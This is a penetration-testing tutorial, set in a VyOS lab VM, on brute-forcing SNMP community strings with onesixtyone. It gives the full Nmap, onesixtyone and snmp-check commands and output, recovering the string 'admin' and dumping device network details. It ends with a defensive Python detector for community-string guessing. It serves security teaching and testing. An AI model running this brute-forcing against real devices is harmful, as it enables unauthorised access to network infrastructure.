Discovering SNMP community strings can be challenging, but the Onesixtyone tool makes this process straightforward and efficient.
If you’re looking to identify SNMP community strings on network devices, you’ve come to the right place. The Onesixtyone tool uses a trial-and-error approach to systematically test candidate community strings against a host, making it an essential utility for security professionals and penetration testers.
In this comprehensive guide, I’ll walk you through exactly how to use the Onesixtyone tool to find SNMP community strings, with practical examples and best practices to help you master this powerful network assessment tool.
First, let’s cover some background.
What is SNMP?
SNMP stands for Simple Network Management Protocol. It is used to exchange management information between network devices: an administrator can gather information about a host on which the SNMP service is running, and, with the right access, modify that information as well.
What is an SNMP Community String?
The “SNMP community string” acts like a user id and password: it is the credential that allows one device (for example a monitoring server or router) to read another device’s statistics. A monitoring application such as IPCheck Server Monitor sends the community string along with every SNMP request. If the community string is correct, the device responds with the requested information. If it is incorrect, the device simply discards the request and does not respond at all.
Important: community strings are used only by devices that speak SNMP v1 or SNMP v2c. SNMP v3 instead uses username and password authentication, along with an encryption key. Most SNMP v1 and v2c devices ship from the factory with a default read-only community string of “public”.
How to Find SNMP Community String?
One can find the SNMP community string using a tool called Onesixtyone. Onesixtyone takes a wordlist provided by the user and brute-forces the SNMP service with it. Please follow the steps in this SNMP pentest article.
Although the factory default for most v1 and v2c devices is “public”, it is standard practice for network managers to change all community strings to custom values during device setup. So if you want to pentest the SNMP service, you have to find the community string first.
Here I have set up an SNMP penetration-testing lab with a VyOS VM. I will explain the full process step by step using proofs of concept and examples.
Steps to Find SNMP Community String
First of all, confirm that the SNMP service is up and that UDP port 161 is open. Here I am using the Nmap tool to confirm:
$ nmap 192.168.43.161 -Pn -sU -p161
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-20 20:19 IST
Nmap scan report for 192.168.43.161
Host is up (0.00025s latency).
PORT STATE SERVICE
161/udp open snmp
MAC Address: 08:00:27:7B:8C:EB (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds
Observe that UDP port 161 is open, which means the SNMP service is up. We can proceed further with the pentest.
Here we have a host, 192.168.43.161, running an SNMP service. We know that an unconfigured or default-configured SNMP service has “public” as its community string.
Let’s check whether we can access the SNMP service with the “public” community string. I will use the snmp-check tool for confirmation.
$ snmp-check 192.168.43.161 -c public
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
[+] Try to connect to 192.168.43.161:161 using SNMPv1 and community 'public'
[!] 192.168.43.161:161 SNMP request timeout
Observe the “SNMP request timeout” error. Since an SNMP agent silently discards requests that carry a wrong community string, the timeout means this host’s SNMP service is not using “public” but a custom community string. We cannot access the service with “public”, so we have to find the real community string.
We will use a tool called “onesixtyone” to brute-force the community string. onesixtyone needs a wordlist of candidate community strings. You can download one from the SNMP Community Strings Wordlist GitHub repository.
This is the onesixtyone help text:
$ onesixtyone -h
onesixtyone 0.3.3 [options]
-c <communityfile> file with community names to try
-i <inputfile> file with target hosts
-o <outputfile> output log
-p specify an alternate destination SNMP port
-d debug mode, use twice for more information
-s short mode, only print IP addresses
-w n wait n milliseconds (1/1000 of a second) between sending packets (default 10)
-q quiet mode, do not print log to stdout, use with -l
host is either an IPv4 address or an IPv4 address and a netmask
default community names are: public private
Max number of hosts : 65535
Max community length: 32
Max number of communities: 16384
examples: onesixtyone 192.168.4.0/24 public
onesixtyone -c dict.txt -i hosts -o my.log -w 100
Now, we will use the onesixtyone tool to brute-force the service with the wordlist.
$ onesixtyone -c snmp_community_strings_wordlist_onesixtyone.txt -p 161 192.168.43.161
Scanning 1 hosts, 3221 communities
192.168.43.161 [admin] VyOS 1.2-snapshot-2019Q4
Here, the -c flag specifies the wordlist, -p specifies the port on which the SNMP service is listening on the remote host, and the final argument is the target IP address.
Observe the results: we found the SNMP community string for the remote host, and it is “admin”. onesixtyone brute-forced the remote host and identified the community string.
We can confirm the community string “admin” with the snmp-check tool.
$ snmp-check 192.168.43.161 -c admin
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
[+] Try to connect to 192.168.43.161:161 using SNMPv1 and community 'admin'
[*] System information:
Host IP address : 192.168.43.161
Hostname : vyos
Description : VyOS 1.2-snapshot-2019Q4
Contact : root
Location : Unknown
Uptime snmp : 04:56:51.36
Uptime system : 02:25:53.89
System date : 2020-9-20 21:57:25.0
[*] Network information:
IP forwarding enabled : yes
Default TTL : 64
TCP segments received : 2030
TCP segments sent : 2030
TCP segments retrans : 0
Input datagrams : 7697
Delivered datagrams : 7693
Output datagrams : 4458
[*] Network interfaces:
Interface : [ up ] lo
Id : 1
Mac Address : :::::
Type : softwareLoopback
Speed : 10 Mbps
MTU : 65536
In octets : 214966
Out octets : 214966
Interface : [ up ] Intel Corporation 82540EM Gigabit Ethernet Controller
Id : 2
Mac Address : 08:00:27:7b:8c:eb
Type : ethernet-csmacd
Speed : 1000 Mbps
MTU : 1500
In octets : 535035
Out octets : 125078
[*] Network IP:
Id IP Address Netmask Broadcast
1 127.0.0.1 255.0.0.0 0
2 192.168.43.161 255.255.255.0 1
[*] Routing information:
Destination Next hop Mask Metric
0.0.0.0 192.168.43.1 0.0.0.0 1
192.168.43.0 0.0.0.0 255.255.255.0 0
Observe that snmp-check enumerated the SNMP service successfully, which confirms that the community string “admin” is correct. This is how we can find the community string.
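The two facts this article relies on, that a v1/v2c community string travels in cleartext in every request and that a wrong one is silently discarded, and the wordlist guessing that onesixtyone performs, have a defensive counterpart: decode the SNMP header off a packet capture and flag any source that cycles through many different community strings. This is an added example, not code from the original article or from onesixtyone; the datagrams, the source addresses and the threshold of three distinct strings are constructed.

```python
"""Decode the cleartext header of SNMPv1/v2c datagrams and flag community-string guessing."""
from collections import defaultdict

def _tlv(buf, pos):
    # One BER TLV: tag byte, length (short or long form), value bytes; returns (tag, value, next_pos)
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def _ber(tag, value):
    # Encode a value with a short-form length (sufficient for the small packets built here)
    return bytes([tag, len(value)]) + value

def snmp_header(packet):
    """Return (version, community, pdu_tag) from an SNMP message; community is None for v3."""
    tag, msg, _ = _tlv(packet, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP SEQUENCE")
    tag, ver, pos = _tlv(msg, 0)
    version = {0: "v1", 1: "v2c", 3: "v3"}.get(int.from_bytes(ver, "big"), "unknown")
    if version == "v3":
        return version, None, None          # v3 carries a user name and auth parameters instead
    tag, community, pos = _tlv(msg, pos)    # OCTET STRING community, sent in cleartext
    return version, community.decode("latin-1"), msg[pos]

def get_request(community, version=0):
    """Constructed sample packet: an SNMP GetRequest for sysDescr.0 (1.3.6.1.2.1.1.1.0)."""
    oid = _ber(0x06, bytes.fromhex("2b06010201010100"))
    varbinds = _ber(0x30, _ber(0x30, oid + _ber(0x05, b"")))
    pdu = _ber(0xA0, _ber(0x02, b"\x01") + _ber(0x02, b"\x00") * 2 + varbinds)
    return _ber(0x30, _ber(0x02, bytes([version])) + _ber(0x04, community.encode()) + pdu)

def guessing_sources(datagrams, threshold=3):
    """datagrams: iterable of (src_ip, raw bytes). Return sources that sent >= threshold
    distinct community strings in GetRequests, the signature of a wordlist run."""
    seen = defaultdict(set)
    for src, raw in datagrams:
        version, community, pdu = snmp_header(raw)
        if community is not None and pdu == 0xA0:   # only GetRequest attempts count
            seen[src].add(community)
    return {src: sorted(c) for src, c in seen.items() if len(c) >= threshold}

# Constructed traffic: a monitoring host using one string, and a host cycling a wordlist
SAMPLE = [("10.0.0.5", get_request("admin"))] + [
    ("10.0.0.99", get_request(c)) for c in ("public", "private", "manager", "admin")]

if __name__ == "__main__":
    print(guessing_sources(SAMPLE))   # the wordlist source is the only one reported
```

Because the agent drops wrong strings without answering (the timeout seen earlier), the guessing never appears in the device’s own logs; a span port or flow records for UDP/161 are where it becomes visible.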